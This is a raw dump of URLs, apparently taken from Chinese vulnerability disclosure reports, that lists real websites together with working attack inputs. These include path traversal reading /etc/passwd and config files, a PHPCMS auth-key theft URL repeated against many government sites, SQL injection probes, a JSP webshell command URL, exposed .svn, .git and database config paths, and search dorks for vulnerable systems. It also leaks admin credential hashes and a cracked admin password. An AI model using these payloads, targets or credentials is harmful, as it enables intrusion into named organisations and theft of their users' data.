http://**.**.**.**//common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://heusei.hrbeu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://heusei.hrbeu.edu.cn/api.php?op=phpsso&code=5505UlYACVIBAgFSVAICXQ9WAgRQDV8DAwRVBwACWhFbXQ9fFUlXDl5VWAxCQFkACxUTAFtRTkEAXgBUF0MIRVRADg9OQ1wOVFFFQgdaRQpCGhlIGVYJXAZTER9LEFwJV1EVQk5DXA5UUUVCTGZ1KHNxZ0FRXBVGDFwGQ0MAVgtRUxVKVkgLUR1HQgcWW1EJUx4DGQZUSkIEQRZADBFdSQJKU1FPEH8wfn8RFF1qUQBbW11BWVwLWxESVRtSShBFVEAOD0ZZVwReQFwDEFxfCmlBUAlQWAccEVMHWwYQGQlbXwgWRgAVUxgeVw4LWkJMRFNdBR0FTxhXG0xPQwVLCl8SCAwAX0sPUEZYDQpqQwdeV14AG0EHUAlXFhcEEVYQQhIDG0ZIEAMYEQ http://btr.800best.com/manage/ http://btr.800best.com/i/login.asp http://btr-daxue.800best.com/Account/Login?ReturnUrl=%2f http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000005008 http://www.jrt2010.com/ http://**.**.**.**/IneduPortal/Components/albums/AlbumShow.aspx?id=1 http://**.**.**.**/IneduPortal/Components/albums/AlbumShow.aspx?id=1 http://**.**.**.**/IneduPortal/Components/albums/AlbumShow.aspx?id=1 http://**.**.**.**/IneduPortal/Components/albums/AlbumShow.aspx?id=1 http://**.**.**.**/IneduPortal/Components/albums/AlbumShow.aspx?id=1 http://mail.benlai.com http://www.pclady.com.cn/ http://passport.lexue.tcl.com/Passport/Login.aspx?ru=http%3a http://console.hit.edu.cn/login http://ilife.homelink.com.cn/aigou/?c=index&a=editprice&sid=519&goods_id= http://invest.dyjr.gov.cn/ReadView.asp?id=1797 http://mail.sohu.com http://youxi.widget.baike.com/index.php/search/index?text=1 http://aqe.wyn88.com/Quickas/wefeedback/wefeedback.jsp http://zone.wooyun.org/content/19358 xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance http://**.**.**.**/data/settings/settings.xml http://**.**.**.**/adminpanel/ http://webmail.fph.cz/data/settings/settings.xml http://mail.silnice-klatovy.cz/webmail/data/settings/settings.xml https://www.lacucaracha.sk/data/settings/settings.xml https://drivemont.sk/data/settings/settings.xml https://**.**.**.**/data/settings/settings.xml http://**.**.**.**/adminpanel/ http://gps2.gps188.com/gps/doif/myLogin.jsp http://www.ftms.com.cn/information/news_detail.php?id=82 http://www.ftms.com.cn/admin/login.php http://erp.guaguaxiche.com:8000/admin/ http://www.11185.com.cn/user/login.html http://wj.aeonlife.com.cn/wj/shop/member!passwordRetrieve.action http://wj.aeonlife.com.cn http://www.szahotel.com/cn/recruitment/jobs.aspx http://a100.aeonlife.com.cn/indexlis.jsp http://www.fcggjj.com/Website/newslist.jsp?ColumnCode=m0303 http://www.fcggjj.com//console/actions/mbean/MBeanFramesetAction?bodyFrameId=wl_console_frame_1384026638791&isNew=false&frameId=wl_console_frame_1384026638792&sidebarFrameId=wl_console_frame_1384026638793&MBean=myweb%3AName%3Dmyweb%2CType%3DDomain http://www.zwcad.com/ http://oa.zwcad.com/console http://gxy.buct.edu.cn,看了下,居然用的supersite7.5,记得以前batch.common.php这个文件是有漏洞的,但是康盛不重视,补了跟没补一样,到目前还是0day,对batch.common.php这个文件注入,联合查询了下,密文出来了,是加过盐的,但是盐也爆出来了,用户名admin,密码ht6789。登录看了下,还是多年前的老系统,可getshell,就不演示了。没有动任何东西,友情检测。 cmccwlan.cn/listch.aspx?from=search&key=123&p=1&ps=10&_=1437632431509 http://219.159.7.18:8001 http://www.cdanet.org/phpcq/login.php?zid=%2079 http://**.**.**.**/bugs/wooyun-2015-0108778 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://house.focus.cn/msgview/8012/331885312.html http://www.ftms.com.cn/splendid/user.php http://www.ftms.com.cn/ www.ftms.com.cn http://www.newv.com.cn/case_enterprise.html inurl:nwc_755_newvexam inurl:nwc_user_cloud inurl:nwc_user_enterpris http://xuexuexue.nipponpaint.com.cn/pass.aspx http://222.195.242.203/pass.aspx http://chrysler.infolearning.so/pass.aspx http://www.mangocity.com/mbrWebCenter/password/init.action http://www.scxcedu.com/showxjhf.aspx?bh=1&mm=2&typeid=3找到一个不用的展示页,吃任何参数都不存在然后跳转到主页。但是发现bh并没有好好过滤,导致了sql注入,闭合一下参数,可以执行多语句。 http://gcxl.hit.edu.cn/jys/Content.asp?id=1 http://gcxl.hit.edu.cn/jpkc/List.asp?Cid=0 http://gcxl.hit.edu.cn:80/jys/WebNews.asp?Nid=1 http://mail.tongbanjie.com http://demo.raisedreams.com/ http://demo.raisedreams.com/user/forgetpwd.aspx http://demo.raisedreams.com/addProject/rewards.aspx?id=107 http://demo.raisedreams.com/addProject/rewards.aspx?id=107%27and%20@@version=0-- http://demo.raisedreams.com/addProject/rewards.aspx?id=107 http://demo.raisedreams.com/addProject/rewards.aspx?id=101 SQL2:/5clib/ebooksearch.action SQL4:/5clib/paperWeb.action?formAction=paperClass&mark=001&classname=??&grade=1 SQL5:/5clib/newsWebManage.action?formAction=newsDetail&Id=8 http://**.**.**.**:8081/5clib/bookWeb.action?formAction=bookBrief&pid=YsdsdebY0008d874Y&ccode=001004006002 http://**.**.**.**:8081/bookWeb.action?formAction=bookBrief&pid=YsdsdebY0008d42cY&ccode=017016003001009 http://**.**.**.**:8081/5clib/ebooksearch.action http://**.**.**.**:8081/5clib/ebooksearch.action http://**.**.**.**:8081/5clib/paperWeb.action?formAction=paperDetail&Id=121384475476591567839023666490 http://**.**.**.**:8081/paperWeb.action?formAction=paperDetail&Id=122170606864184234595307531536 http://**.**.**.**:8081/5clib/paperWeb.action?formAction=paperClass&mark=001&classname=%E6%B3%95%E5%BE%8B%E4%B8%93%E4%B8%9A%E8%AE%BA%E6%96%87&grade=1 http://**.**.**.**:8081/paperWeb.action?formAction=paperClass&mark=006&classname=7&grade=1 http://**.**.**.**:8081/5clib/newsWebManage.action?formAction=newsDetail&Id=8 http://**.**.**.**:8081/newsWebManage.action?formAction=newsDetail&Id=3 http://**.**.**.**:81/newsWebManage.action?formAction=newsDetail&Id=8 http://**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini http://**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini http://www.hecom.cn:80/phone/culdetail.php?id=199 https://passport.eteams.cn/password https://passport.eteams.cn https://passport.eteams.cn/password/reset?key=YWtsZm9lb0AxNjMuY29tJkhyTWREMGo5a3ExVUw3cH00BGMnIrRHFlYmRvdGdJMFh1Y0NtcHJGeGFPYkdqcmRqU291STVqeVJ0TWc5SnU2ZWo http://www.ccsa.org.cn/tc/baopi.php?baopi_id=4640 http://wuhan.whhd.gov.cn/news/news.jsp?id=Ay247R370wjC55Wv4X04IMr7Ltn777vl http://wuhan.whhd.gov.cn/zt/315_2014/more.jsp?id=115002 http://m.nanapanda.cn/order/list?start=1&limit=5 http://m.nanapanda.cn/pay/wxpay/?orderNo=XXXXXX http://m.nanapanda.cn/user/center http://www.id68.cn http://www.id68.cn/member/memberinfo/editmemberinfo/ http://www.id68.cn/member/memberinfo/editcontact/ app7.moonbasa.com/Apporder.json/getorderlist?pageindex=1&hasit=true&searchDate=0&ordertype=0 http://app7.moonbasa.com/Apporder.json/getorderdetail?ordercode=0031023912&hasit=true http://125.77.202.194:8000/ http://cas.wyn88.com/ http://cas.wyn88.com/ http://t.jiwu.com http://t.jiwu.com/info!edit.action http://211.137.7.84:8080/ErrorInfDownLoad?errorName=/../../../../../../../etc/passwd http://211.137.7.84:8080/ErrorInfDownLoad?errorName=/../../../../was/webroot/WEB-INF/web.xml http://www.bwie.com/zscx/search_ceshi.asp http://www.bwie.com/zscx/search_ceshi.asp?studentname=wangpeng&keywords=370828198710053271&keywordsz=378902211199&sjm_code=9249&x=76&y=8”注入点成功,并可以了解到使用SQL http://dec.jlu.edu.cn/baozi/work/firstpage/info_showDetail.jsp?index=13024 http://www.hnfo.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://218.2.102.180/ http://218.2.102.180/one8.jsp http://218.2.102.180/wooyun1.jsp?comment=cmd+%2Fc+dir+E:\bea\user_projects\domains\njfxyc_domain\autodeploy\njfxyc\ inurl:/themes/mskin/login/ inurl://mskin/login/ http://www.mm-office.com:7890/easoa/themes/mskin/login/login.jsp http://113.106.196.36:7890/oa/themes/mskin/login/login.jsp http://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsp http://oa.hdbp.com/themes/mskin/login/login.jsp http://www.gowellchina.com/oa/themes/mskin/login/login.jsp http://oa.xpngs.com/oa/themes/mskin/login/login.jsp http://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsp http://oa.hebcs.com:7890/oa/themes/mskin/login/login.jsp http://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsp http://oa.gongchuang.net:81/oa/themes/mskin/login/login.jsp http://oa.xpngs.com/oa/themes/mskin/login/login.jsp http://oa.fghev.com:7890/oa/themes/mskin/login/login.jsp http://60.173.150.111:7890/easoa/themes/mskin/login/login.jsp http://oa.gdchangda.cn:7890/easoa/themes/mskin/login/login.jsp http://oa.jimbshoes.com/oa/themes/mskin/login/login.jsp?login_error=quit http://oa.gdchangda.cn:7890/easoa/themes/mskin/login/login.jsp http://www.laoken.com:7890/oa/themes/mskin/login/loginFullScreen.jsp?login_error= http://m.pconline.com.cn/member/userAddress/receiveAddresses.htm?id=122144 http://m.pconline.com.cn/member/userAddress/receiveAddresses.htm?id=121144 http://www.p2p222.com/index.php/LoanApply/index.html http://www.epicc.com.cn/ecenter/views/ecenterClub/loginRegisterNew/login.jsp http://www.wy-fund.com/index.php?m=instarea&c=inbrok&a=init&inst_id=55 www.wy-fund.com/index.php?m=instarea&c=infund&inst_code=80000220 https://hy.allinpay.com/invoker/JMXInvokerServlet hy.allinpay.com/invoker/JMXInvokerServlet system:type=ServerInfo hy.allinpay.com/invoker/JMXInvokerServlet system:type=ServerInfo http://www.zhubaodai.com/ http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3335 http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://www.cfcgs.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://zdyq.cpnn.com.cn/.svn/entries http://zdyq.cpnn.com.cn/libs/config/database.php http://dlyq.cpnn.com.cn/admin http://faq.minyoun.com/index.php?admin_main http://221.237.157.194:8000/ecrs/ https://g.wen.lu/search?newwindow=1&biw=1680&bih=903&noj=1&q=site%3Acits.com.cn++openFile.jsp&oq=site%3Acits.com.cn++openFile.jsp&gs_l=serp.3...6980.6980.0.7138.1.1.0.0.0.0.0.0..0.0.ckpsrh...0...1.1.64.serp..1.0.0.PD9P6TZlS0E http://member.jsj.com.cn/findpwd?type=1 http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://file.jsj.com.cn/css/member/header_footer.css http://file.jsj.com.cn/css/member/login.css http://file.jsj.com.cn/css/public/public.css http://file.jsj.com.cn/images/public/favicon.ico http://file.jsj.com.cn/js/member/login.js http://file.jsj.com.cn/js//jquery.js http://file.jsj.com.cn/js//jsj.js http://file.jsj.com.cn/js/member/member.findpwd2.js http://www.jsj.com.cn/ http://www.jsj.com.cn/BottomLink/about_intro.aspx http://www.jsj.com.cn/BottomLink/D2D/index.html http://www.jsj.com.cn/sitemap.aspx http://gc.jsj.com.cn/bscrm/ebooking/login.aspx http://www.jsj.com.cn/BottomLink/dfdl.aspx http://www.jsj.com.cn/BottomLink/job.aspx http://www.jsj.com.cn/Card/index.html http://www.jsj.com.cn/BottomLink/about_department.aspx http://www.jsj.com.cn/BottomLink/flink.aspx http://forum.jsj.com.cn/ http://www.jsj.com.cn/promotion/cata-zs/index.htm http://file.jsj.com.cn/images/public/ico_footer_img01.gif padding-right:5px http://www.itrust.org.cn/yz/pjwx.asp?wm=2582501947 http://file.jsj.com.cn/images/public/ico_footer_img02.gif padding-right:5px;"/ https://search.szfw.org/cert/l/CX20120801001603001683 http://file.jsj.com.cn/images/public/ico_footer_img03.gif padding-right:5px http://www.anquan.org/s/www.jsj.com.cn http://file.jsj.com.cn/images/public/ico_footer_img04.gif http://float2006.tq.cn/floatcard?adminid=9556114&sort=0 url:http://www.qdzk.gov.cn/qdzk/admin/ http://xxgk.yckfq.gov.cn/index.php?m=zwhd&c=index&a=zmhd_register&siteid=1&mktype=4 admin:e1b4e15af3984ae36808eb1a4c81781a# http://www.yckfq.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=ceshi&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.yckfq.gov.cn/api.php?op=phpsso&code=9a67AwEHAwIBVAUBBQ9WBlpdA1UBVVBSUVdSXVcEAkQIXV4OQk5dXl4DXF8TTFpWBB4SVwtVSkMACQQHQUVQEAdAX14ZRFZeVAdBEVZWRlxNERgfSVINXgYEFUwdFgRcBFFEExlEVl5UB0ERHWp2fnx6ZhYBWBFEDAsCEBUGDl4CU0QbAU8BAR0RRlRHV1JfXBUCTlZQTkAEFhITWhcFHFFKAgAYF3VgfikVFmpYV19QVxJaDFwLREVVTVUcTEFWE11dE1hZVV1DCVRFXFZdbUpaWlMIUExEBAcNAUZFDVkMW0QTARsCGx0CWV5aSxtAWFdWHlUYSAJMTBlEUxcOXUFbXlVeRV5TRQ1aX2pKUFpcVFMYEVAAXAAWQQNHChRAQVBJE0keUhsS http://aio.hkairlines.com/ac3s/fortunewings/searchMember http://www.epicc.com.cn/shoujirenbao/ http://221.228.242.122/ http://mail.cits.com.cn http://jpk.sicnu.edu.cn/exercises/exercires_stuexamshowinfo.asp?cno=201019&cid=1 http://jpk.sicnu.edu.cn/kcListT.asp?nf=2008 http://jpk.sicnu.edu.cn/satAdmin/getserverfile.asp inurl:http://c.highpin.cn/Job/JobChanceAnonymous?Encryptid= http://c.highpin.cn/Job/JobChanceAnonymous?Encryptid=562C063659365E611F350769026B9&FromEmail=192C40360C361F6149355A69596B0F2C523629365A611A350569186B022C5A3604369&FromType=6 http://c.highpin.cn/Job/JobChanceAnonymous?Encryptid=562C033650365D6119350F69016B9&FromEmail=0D2C4036063601615F350369046B542C753658365D611F351869556B0E2C58369&FromType=14 http://218.30.108.51/t.php http://218.30.108.51/smarty_temp/views/autodata/listtask.php http://www.snjrsj.gov.cn/hbwz/testword?methods=writeWord&id= http://www.ss12333.com/hbwz/testword?methods=writeWord&id= http://www.hbsz12333.gov.cn/hbwz/testword?methods=writeWord&id= http://www.hbxg12333.gov.cn/hbwz/testword?methods=writeWord&id= http://www.xianlife.com/shop/index.php?act=login&op=forget_password http://git.100msh.com admin:22147b87d364edd75ac7073612b0988e http://www.tszsj.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.tszsj.gov.cn/api.php?op=phpsso&code=f5ccAwUAAgMBVlJRVQQAUFdXDFdUWQRTBFNTBVRWVk1bWA8ORklcX14BCw9DRl4FDhIUAFkFThVTXQNVFxcEGVRFDl4dQ1dfVAUWQQZcQg9HHR5IGwIJCFVQEh5LRFBVV1QVEx1DV19UBRZBTWByLXZ2YEFTCBUSX18FQkNUWldRVhUbBUgAAB0TEQQXXVYMVhkEGQQAShZXQhVBDEVRFQJPUwAcEHRhfitCRjpSUwxaWxQNXgwPEhYBSgdKHhVfQFgME1xeVFxDCwMVDFxZPkBWXARaAEgSV1MKUxAXWVBfXhUTBRwDGh0ADg4KQR8TUltQSQdITFQfGB4WBUVaVBJeD1VaQl9SRQ8NDzpAVAlWWFVPQwAEClNCRlERWEBJElUYE00ZUxoS inurl:www.99bill.com/rmouter/mReply/mReply.htm?sendEmailId= http://www.dt.gov.cn:8080/contents.php?id=9503 http://tseller.tshenbian.com/view/login.php?action=login http://nfs.pdsagri.gov.cn/FCKeditor/editor/filemanager/upload/test.html http://nfs.pdsagri.gov.cn/FCKeditor/editor/filemanager/upload/test.html http://www.qysi.gov.cn/websys/jsp/website/emailbox/emailbox_view.jsp?ROW_ID=201408070000031704 https://exmail.qq.com/ http://www.jluzh.com/mysqladmin/index.php http://101.129.1.201/ http://223.202.23.7/ http://user.mofangge.com。神奇的发现里面有一个接口,看样子是获取手机号码的.于是,我填了一个很靓的魔方格帐号,成功了 https://mall.gree.com/mall/FindPasswordView?storeId=10652&catalogId=10001&langId=-7 http://www.aokang.cn/point.html http://mbs.zufangzi.com/gms/order/contractApiController/getContractListByCustomer.do?customerId=317134 http://mbs.zufangzi.com/gms/order/contractApiController/getContractListByCustomer.do?customerId=318014 http://mbs.zufangzi.com/gms/ddAZQGY/pdf/contract/20150112/PEK10023456.pdf?contractId=32022&agentId=2233&orderItemId=334455 http://mbs.zufangzi.com/gms/ddAZQGY/pdf/contract/20150509/PEK10027843.pdf?contractId=30614&agentId=1789&orderItemId=251701 http://mbs.zufangzi.com/gms/ddAZQGY/pdf/contract/20150508/PEK10027478.pdf?contractId=30218&agentId=2111&orderItemId=253042 http://jw.sxjgxy.edu.cn/ http://220.167.53.63:81/ http://jwmis.dzvtc.edu.cn/ http://score.xaau.edu.cn/ http://jwgl.lynu.edu.cn/ http://www.cdtlgcxx.com:2110/ http://www.lznews.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.lakala.com www.lakala.com http://chebixia.com/ http://selfhelp.csgwbn.com/ http://123.232.100.133:8080 http://yhbz.chinasafety.gov.cn:8003/lhdlxjk-aj/ http://www.stats.gov.cn/tjsj/tjbz/xzqhdm/201504/t20150415_712722.html m.zhongsou.com/.svn/entries http://un.zhongsou.com/.svn/entries http://doogua.dangdang.com/auth http://58.61.29.110/main.aspx http://221.232.64.211:8080/git/Flex/atm.html URL:http://ask.csdn.net/?sort_by=created_at&type=unsolved http://pn.sina.com.cn/reg_list.php?od=5&of=js&pid=5&tids=11&type_u=1 https://github.com/JerryLiang/api/blob/b6807044590b6f3988f5f54f7dc33f636257aa6f/.svn/pristine/0c/0cf5eaeefe2f4e7aa87c2e26f3e1f8592dc20159.svn-base https://github.com/JerryLiang/api/blob/b6807044590b6f3988f5f54f7dc33f636257aa6f/.svn/pristine/eb/ebe0edd60d7e3fa9d2807c3e129a0c4522d8d3c7.svn-base https://github.com/JerryLiang/api/blob/b6807044590b6f3988f5f54f7dc33f636257aa6f/.svn/pristine/eb/ebe0edd60d7e3fa9d2807c3e129a0c4522d8d3c7.svn-base https://github.com/JerryLiang/api/blob/b6807044590b6f3988f5f54f7dc33f636257aa6f/.svn/pristine/c1/c16c5996f487c85e575d76b84a483b7529dafb6d.svn-base https://github.com/JerryLiang/api/blob/b6807044590b6f3988f5f54f7dc33f636257aa6f/.svn/pristine/17/17ef360027f3fd5f39058359f232c6726b719ce2.svn-base http://cbapi.iddsms.com/smspro.php?userId=J22088&password=********&pszMobis=***********&pszMsg=%E4%B9%8C%E4%BA%91%20%E5%A4%A9%E5%9C%B0%E4%B8%8D%E4%BB%81%E4%BB%A5%E4%B8%87%E7%89%A9%E4%B8%BA%E5%88%8D%E7%8B%97%20%E6%B5%8B%E8%AF%95&iMobiCount=1&pszSubPort=*&type=1 http://www.aokang.cn/ http://www.itsmv.com/_d276389259.htm http://www.ctnma.cn/,中国电信-综合办公系统,应该是新疆电信的,存在原始密码,用常用用户名和原始密码123456可得到不少可用账号,修改密码登陆后可以看到新疆电信高层和员工联系方式。 http://seller.cctvmall.com/cshop/page/page_book_v_cs_sellororder?zw_f_order_code=DD150711100010 https://passport.eteams.cn/password http://www.peaksport.com/candidate.php?subject=%E6%8B%9B%E5%95%86%E4%B8%93%E5%91%98&rid=290 http://www.airchinajet.com/bjhk_en/stations/5154f5fd07f/index.php/5167d8580a?id=17 http://www.airchinajet.com/download.php?url=2013/../../../config.php http://www.airchinajet.com/do.php http://www.airchinajet.com:8080/stations/5154f5fd07f/manager/login.php/login http://www.airchinajet.com:8080/page/do.php/5154f5fd07f/code/5173af000a http://mpweixin.com/微信管理入口地址http://api.mpweixin.com/index.php?g=Home&m=Index&a=login存在注入漏洞,导致大量微信公众号信息泄露。 https://mail.21vianet.com http://doogua.dangdang.com/ http://icp.now.cn:80/post.php http://cc.yundasys.com:8087/callcenter_new/popedom/userLogin.action http://220.191.211.53/jnjp/login/Jeecms.do http://mobile.cqyjs.com:89/ http://oa.cqyjs.com:8080/ http://mail.cqyjs.com/ http://mobile.cqyjs.com:89/m1/login.do http://oa.cqyjs.com:8080/ http://hzjj.hzga.gov.cn/web/jgdt/info.aspx?newid=2423 http://202.121.241.187:8088/login.action http://60.209.238.28:8080/qdqts/productInfoBarCodeManagerInit_barCodeInfoInit.action存在命令执行漏洞 active:yes http://www.imre.gov.cn/Inspire/js/common/cmsUploadImage.action?imgUrl= http://www.imre.gov.cn/Inspire/upload/sysup/2015-07-24/201507240930086442.jsp http://www.ahty.gov.cn/ http://www.ahty.gov.cn:8080/defaultroot/sp/login.jsp http://buy.ccb.com/ http://**.**.**/ http://tzb.hit.edu.cn/campus_news.asp?id=717 http://e-booking.net.cn/login.html http://www.epeaksport.com http://www.epeaksport.com/XP001-MemberDatum/saveData.html http://token.bizcn.com/token.tar.gz http://tongji.diandao.org/.git/ https://**.**.** http://www.ijindun.com/News/gonggao/212615.html http://221.231.103.226:8008/login.do http://221.231.103.226:8082/logino.php http://www.ahyx.cc/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://mail.sasmac.cn/ http://wx.50cms.com/wwwroot.rar http://www.hubeisafety.gov.cn/sample/up_board4.asp www.hubeisafety.gov.cn http://www.hubeisafety.gov.cn http://www.hbcz.gov.cn http://www.hbcz.gov.cn:7001/XZQHQueryWAR/xxcx/nrcx.jsp?code=421087&bkj=D421087 www.hbcz.gov.cn:7001 http://www.hbcz.gov.cn:7001 http://www.diandao.org/qiye/index.php/Home/Index/showalternate?id=804%20AND%20SLEEP%285%29 http://sso.888.cn/sso/login http://scm.888.cn:8091 https://github.com/s016374/ztx-autotest/blob/a6456b00235ba4659064bb546a3d2b86cd8708ee/ztx-util/src/main/resources/mail.properties http://**.**.**.**:8090/opac/xskp.jsp?kzh=zyk0006417&dztm=&dctm= http://www.szcgs.com.cn/wscgs2/Query_cond.aspx www.szcgs.com.cn http://www.hitem.cn/news_detail.php?id=34 http://login.5ebo.com/api.php?op=game_list_api&gid=9&count=3 http://zhongyi.ifeng.com/uploads/userpic/201507241318276113.aspx http://service.homelink.com.cn/wct/demand/outEntrust/toIndex http://tc.homelink.com.cn/Login.aspx http://wooyun.org/bugs/wooyun-2015-0128481 http://wooyun.org/bugs/wooyun-2015-0123889 http://www.nmca.gov.cn/web/yj.php?id=83&f_id=28&jb=2 https://222.133.0.219/Welcome.enlink?actType=init http://10.116.129.34:81/isbm/ ftp://14.23.175.4/ http://www.sdytjy.cn/ http://www.zteclouds.cn,中兴云服务 http://www.zteclouds.cn/portal/user/forget.htl http://www.zteclouds.cn/portal/user/resetPassword.htl,表单内容就是用户名(邮箱),和新密码两个参数,直接提交这个表单就可以重置: http://124.251.36.97:8080/#/login http://www.hzuni.com:80/ www.hzuni.com http://172.16.1.11.xip.io http://www.172.16.1.11.xip.name http://ilife.homelink.com.cn/aigou/?c=index&a=detail_pinglun&id=10125 http://www.qhflh.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.qhflh.gov.cn/api.php?op=phpsso&code=5045BAQHUQIJAlRSAVIFUlNUAlEFAQFRVAJQUVFVBhYMXVgJR04PXlZVDQwXFltQXkMVBQ9THEEAWlQBFhRUQgNAWVkcRAReXFEQQlIMR1oXTB9NTVRbXAZXRUpKRwAOAFFCFBxEBF5cURBCGTB3eCYnYUQFXkdGDFhSFkJXCgwGU0IcBE9TARVHFwdDDVNZBkgFHFJWGEIERUIVDUYBTlVKBAcdFydgdn9ERW4CVlkKChUICFpdRkUGHVNLHUUEF11bFF1ZB11LXwUWWAxcaxAHXQEMVhpGBFRdBxEUCQsIW0IUBBtQGxVUCA1eERpGAgpRTFEeHgBMH0lCBEYKD0VbWFJbRQxTTVsLDG4QUVwGCVRKFVZWXgBFEQUQWxASRVBPFEweABsa http://ilife.homelink.com.cn/aigou/index.php?m=PersonalCentre&a=addressEdit&adId=10000 http://mail.zhuhai.gov.cn/coremail/index.jsp http://new.citsbj.com http://zyyd.media.open.com.cn/picadmin/seepaper.asp?id=1472001&course_id=0001 http://61.157.117.68/advance/index.htm http://kaoshi.sankuai.com/ http://kaoshi.sankuai.com/kaoshi/user/getpwd/back http://media4.open.com.cn/L603/dongshi/zhongxiaoxxzjxyj/detail_mingci.asp?id=213 http://hz.5i5j.com/regLogin/phoneLogin http://hz.5i5j.com/regLogin/register http://easyxiu.zol.com.cn/H/ http://easyxiu.zol.com.cn:80/H/ eat.gd.sina.com.cn/include.tar.gz http://fz.fjycw.com/news_search.aspx http://go.cqcb.com/mobile/index.php http://www.cqcgs.gov.cn/1.rar http://**.**.**.**:9080/qsksyy/ www.now.cn www.now.cn http://law.cqupt.edu.cn/kecheng/xs/exam.php?id=&cat_id=10 http://m.edingtou.com/member/common/forgetpwd1 http://m.edingtou.com/member/common/resetpwd http://update.haozip.2345.com/ http://download.2345.com/haozip/ http://update.haozip.2345.com/ http://hq.sicnu.edu.cn http://119.146.222.247/eagleye/clientUpgrade.do?filePath=../../../../../../../../../../var/www/html/index.html http://119.146.222.247/eagleye/clientUpgrade.do?filePath=../../../../../../../../../../etc/passwd http://www.lwga.gov.cn/ http://www.lwga.gov.cn/station/newslist.php?sortid=2&mid=chengdong&page=1 http://www.zhong-bei.com/common.asp?id=2 http://sqlmap.org http://www.epeaksport.com http://www.hljiic.gov.cn/pages/MainPortalSearchList.aspx?SearchText=2015&NodeID=0 ftp://120.196.135.123/ ftp://120.196.135.123/ucpbossbackup20111114/uetong/website/web.config http://boss0752.uetong.com http://0752.uetong.com http://www.cmsmc.cn/index_html.shtml http://www.cmsmc.cn/zhaopin/login.jsp http://www.cmsmc.cn/zhaopin/resume/resume_create.action http://is.gd/xxxxx http://www.108.com.tw/main04/108news/news_detail.php?Id=155 http://www.fjipo.gov.cn/templates/znjs.jsp?colid=2&fid=2 http://**.**.**/console_ http://**.**.**/newsedit/ 